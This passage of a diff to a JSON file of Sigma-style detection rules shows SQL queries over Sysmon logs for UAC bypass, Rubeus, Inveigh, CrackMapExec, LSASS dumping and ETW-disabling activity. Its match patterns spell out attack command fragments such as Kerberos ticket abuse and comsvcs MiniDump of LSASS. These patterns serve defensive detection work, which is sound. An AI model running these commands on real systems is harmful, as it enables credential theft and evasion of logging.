LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", 
@@ -8278,894 +8036,904 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "status": "experimental", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Very unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR 
(CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "status": "test", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' 
OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": 
"fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Unknown" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": 
"proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.t1059.001", + "attack.t1027" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE 
'%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage 
LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' 
AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? 
\\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. 
As seen being used in the POC NtdllPipe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects 
actions that clear the local ShimCache and remove forensic evidence", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "status": "experimental", + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE 
